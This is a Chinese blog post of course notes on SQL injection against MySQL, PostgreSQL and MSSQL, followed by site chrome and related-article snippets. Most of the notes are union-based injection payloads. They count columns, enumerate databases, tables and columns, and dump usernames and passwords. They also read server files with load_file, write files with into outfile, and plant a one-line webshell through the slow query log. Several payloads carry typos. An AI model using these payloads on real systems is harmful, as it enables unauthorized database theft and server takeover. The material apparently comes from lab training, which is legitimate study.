SQL读写注入&MYSQL&MSSQL&PostgreSQL

最新推荐文章于 2024-08-20 19:49:43 发布
最新推荐文章于 2024-08-20 19:49:43 发布
阅读量1.1k 收藏 18
点赞数 18
分类专栏: 小迪安全 文章标签: sql mysql sqlserver
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_74275515/article/details/139373319
版权

目录

#知识点:

#详细点:

案例演示1

MYSQL注入中load file()函数的进一步应用:

路径获取:

root用户注入读写不成功:​编辑

案例演示2

案例演示3

#知识点:

1、SQL注入-MYSQL数据库

2、SQL注入-MSSQL数据库(sqlsever)

3、SQL注入-PostgreSQL数据库

#详细点:

Access无高权限注入点-只能猜解,还是暴力猜解

MYSQL,PostgreSQL,MSSQL高权限注入点-可升级读写执行等

案例演示1

MYSQL-root高权限读写注入

select load file(' '):进行文件读取

select 'xxxx' into outfile 'd:/1.txt':进行文件写入

读取此路径下的conn.php

报错原因:在书写路径时不能使用“\”,要用“\”或者“/”

查看源代码,信息泄露

MYSQL注入中load file()函数的进一步应用:

路径获取:

1.phpinfo

2.报错

3.字典等

读取配置性文件

root用户注入读写不成功:

secure-file-priv:限制操作路径

无法写入:securefilepriv突破

注入中需要支持SQL执行环境,没有就需要借助phpmyadmin或能够直接连上对方数据库进行绕过

set global slow query_log=1; 开启日志记录

set global slow_query _log_file='shell路径'; 设置日志记录路径

select ''or SLEEP(11); 执行一句话木马后门

案例演示2

PostgreSQ4-高权限读写注入

-测列数:

order by 4 正确

orderby 5 错误

and 1=2 union select null,null,null,null

-测显位:第2,3

and 1=2 union select 'null',null,null,null 错误

and 1=2 union select null,'null',null,null 正常

and 1=2 union select null,null,'null',null 正常

and 1=2 union select null,null,null,'nul' 错误

-获取信息:

and 1=2 UNION SELECT null,version(),null,null

and 1=2 UNION SELECT null,current user,null,null

and 1=2 union select null,current database(),null,null

-获取数据库

and 1=2 union select null,stringagg(datname,','),null,null from pgdatabase

string_agg(datname,','):将数据库以逗号分割

-获取表名

1.and 1=2 union select null,stringagg(relname,',’),null,null from pgstat_user-tables

2.and 1=2 union select null,string_agg(relname,',’),null,null from pg tables where schemaname='public'

-获取列名:

and 1=2 umion select null,stringagg(column name,’,’),null,null from informationschema.columns where tablename='regusers'

-获取数据

and 1=2 union select null,stringagg(name',' ),stringagg(password','),null from reg_users

-补充-获取dba用户(同样在DBA用户下,是可以进行文件读写的)

and 1=2 union select null,stringagg(usename','),null,null FROM pguser WHERE usesuper IS TRUE

参考:http://​ https://www.freebuf.com/sectool/249371.html ​

案例演示3

MSSQL-sa高权限读写执行注入

3错误

4正确 5错误

-测列数:

order by 4

and 1=2 union all select null,null,null,null

2,3都有回显

-测显位:

and 1=2 union all select null,1,null,null

and 1=2 union all select null,null,'s',null


-获取信息:

@@version 获取版本信息

db_name()当前数据库名字

user、systemuser,currentuser,user_name 获取当前用户名

@@SERVERNAME 获取服务器主机信息

and 1=2 union all select null,db_name(),null,null

-查询表名:

and 1=2 union all select nul,(select top 1 name from mozhe dbv2.dbo.sysobjects where xtype='u'),null,null

查询其他表:

and 1=2 union all select null.(select top 1 name from mozhedb -v2.dbo.sysobjects where xtype='u' and name not in ('manage”),null,null

-查询列名:

and 1=2 union all select null,(select top 1 colname(objectid('manage’),1) from sysobjects),null,null

-查询数据:

and 1=2 and 1=2 union all select null,username, password ,null from manage

Levi823
关注
专栏目录
sql注入-MySQL
2202_75361164的博客
04-07 1235
盲注点确认后,我们一般不会去手动尝试一个字节一个字节的跑出来,而是采用工具比如sqlmap或者一些脚本来辅助我们,毕竟是属于重复无意义的工工作,交给机器就好了语句和之前其他查询都是类似,唯一的区别,就是盲注变成了一位字符一位字符的判断,不像之前那样一次性全部获取数据。
第25天:web攻防-通用漏洞&sql读写注入&MYSQL&MSSQL
最新发布
m0_74741186的博客
10-02 1778
使用load_file读取网站关键性内容,在sql注入中,我试了读取不道,明明在数据库可以读到,对了,能读取到,前面1没有改,应该是优先读取1的值,把1改成不存在的值,就会显示后面语句执行的结果。set global slow_query log file='shell路径'(shell路径需要在前期知道目标网站的绝对路径)MYSQLPostgreSQL,MSSQL高权限注入,可升级为读写执行。读取网站的数据库配置文件等在网站找一写默认配置文件的地址,一些有价值的文件。1、sql注入-mysql数据库。
SQL注入(MySQL)
jxy158212的博客
01-02 1237
通过把SQL语言注入到Web的表单或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意SQL命令目的的入侵行为。该博客以mysql数据库为例,讲解不同注入类型
PostGREsql手工注入
2302_77944815的博客
08-20 215
1.查看是否存在注入点 2.用order by查看列数 3.测试回显字段 4.爆所有的数据库 5.爆表 6.查询字段 7.爆数据 8.破解密码
SQL注入-文件读写
m0_73902453的博客
07-25 1166
就是利用文件的读写权限进行注入,它可以写入一句话木马,也可以读取系统文件的敏感信息。
SQL注入读写文件
weixin_43765321的博客
03-02 3710
1. 读写文件的基本条件和使用 1.1 SQL注入文件读写 SQL注入有直接SQL注入,也有文件读写时的注入,后者的主要目的在于获取webshell或盗取重要文件。 1.2 文件读写的基本条件 当前用户权限对该文件可读。 文件在该服务器上。 路径完整。 文件大小小于max_sllowed_packet。 当前数据库用户有FILE权限,File_priv为yes secure_file_priv的值为空,如果值为某目录,那么就只能对该目录的文件进行操作。 在MySQL5.5.53中,File_priv默认
sql 注入读写文件
yuan_boss的博客
08-24 807
获取到用户为root,主机为localhost,然后将这两个信息作为条件,接下来查看是否有文件读写权限。与当前mysql用户具有File_priv权限之外,还要确保当前系统用户具有访问hosts文件的权限。根据结果可知,当前mysql用户为root,主机为名为localhost。要想复现sql注入读写,首先mysql就需要满足下面的条件。想要读取某个文件,除了需要需要关闭mysql中的安全选项。本次实战,以sqli_labs靶场的第1关为例。发现读取成功,看到了hosts文件的内容。通过联合注入的方式,
SQL注入之文件读写
永远是少年
06-27 2250
今天继续给大家介绍渗透测试相关知识,本文主要内容是SQL注入之文件读写。 一、SQL注入文件读写函数 二、SQL注入文件读写之secure_file_priv参数 三、SQL注入文件路径获取 四、SQL注入文件读写之魔术引导开关......
数据库管理工具 支持MYSQL MSSQL PostgreSQL SQLIte ETCD
05-09
在提供的标题和描述中,提到了几种主要的数据库系统:MYSQLMySQL)、MSSQL(Microsoft SQL Server)、PostgreSQLSQLite,以及ETCD,这是一个分布式键值存储系统,通常用作服务发现和配置管理。接下来,我们将...
PostgreSQL,mysql,MS SQL,Oracle性能对比.docx
01-08
本文将对比四种主流的关系型数据库管理系统(PostgreSQLMySQL、Microsoft SQL Server (MSSQL)、Oracle)的性能表现,旨在帮助读者理解每种DBMS的特点及其适用场景。 #### 二、数据库系统概述 1. **PostgreSQL** -...
注入&Sqlmap
DebbieLi_Ca的博客
10-25 636
中心主题 sqlmap SQLMap介绍 1.Sqlmap介绍 2.Sqlmap环境安装 3.sqlmap下载 sqlmaap版本查看 sqlmap获取目标 1.sqlmap直连数据库 -d表示直连 –banner 获取banner信息 2.sqlmap URL探测 3.sqlmap文件读取目标 可以探测多个URL 4.sqlmap google批量注入 sqlmap请求参数设置 Sqlmap设置HTTP方法 get和put POST在请求的时候,服
关于SQL注入中文件读写的方法总结
09-09
主要给大家介绍了关于SQL注入中文件的读写方法,文中通过示例代码介绍的非常详细,相信对大家具有一定的参考价值,需要的朋友们下面来一起看看吧。
SqlServer ,postgresql-8.3-603, mysql,oracle以及将数据导入到excel 的相关jar包
12-30
Java开发者通常会用到`mysql-connector-java.jar`来建立与MySQL服务器的连接,执行SQL命令,读写数据。此JAR包包含所有必要的类和接口,使得Java应用程序能够与MySQL数据库无缝集成。 Oracle数据库是全球领先的商业...
sql注入 - 读写文件
wcy19990628的博客
02-10 350
读文件: http://localhost/sqli-labs-master/Less-2/?id=-1 union select 1,2,load_file("D:\\phpStudy\\PHPTutorial\\Apache\\conf\\httpd.conf")-- - 在显示位上显示apachectl的配置文件的信息 这就是load_file()函数的用法 2.写文件 http...
SQL注入实战MySQL_SQL注入实战-MySQL
weixin_35070578的博客
02-11 327
靶场地址:https://mozhe.cn/bug/detail/MFZ4VjBxRnlIMHBUdGllRDJBMWtRZz09bW96aGUmozhe进入靶场详情页,点击启动靶场,根据系统提供的信息进入靶场环境。Php注入mysql查询语句,由地址中的“?id=MQo=”可以看出,此处传递时用了base64编码,base64解码“id=MQo=”为1,常用mysql注入语句:这里仅列出常用的信...
SQL注入中的文件读写操作:技术解析与防范策略
weixin_43822401的博客
05-24 575
SQL注入攻击是网络世界中的一个严峻问题,它允许攻击者通过构造特殊的SQL语句来操纵数据库。在某些高级的SQL注入攻击中,攻击者不仅能获取数据,还能读取和写入服务器上的文件。本文将深入探讨SQL注入中的文件读写操作,提供详细的技术解析和实用的防范策略。SQL注入文件读写是指攻击者利用SQL注入漏洞,读取或写入服务器上的文件。这种攻击可以用于窃取敏感信息、上传恶意代码或实现持久化控制。
SQL注入MySQL
weixin_44508748的博客
05-06 221
一、union联合查询 1.判断注入漏洞 2.判断字段数目 order by x 3.union联合查询,爆字符列位置 union select 1,2,3,4,5 4.在字符列上查询相关数据库信息 union select 1,version(),database(),4,5 # 获取数据库信息,其他: union select distinct table_schema from info...
sql注入(mysql)
m0_73452266的博客
04-20 576
sql注入基础
SQL注入攻击详解与防范:MySQL & SQL Server 版
"SQL Injection Cheat Sheet" 是一份详细整理了SQL注入攻击方式的文档,适用于MySQL、Microsoft SQL Server,部分适用于ORACLE和PostgreSQL数据库。文档由Ferruh Mavituna编写,旨在帮助读者理解SQL注入的基本概念,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值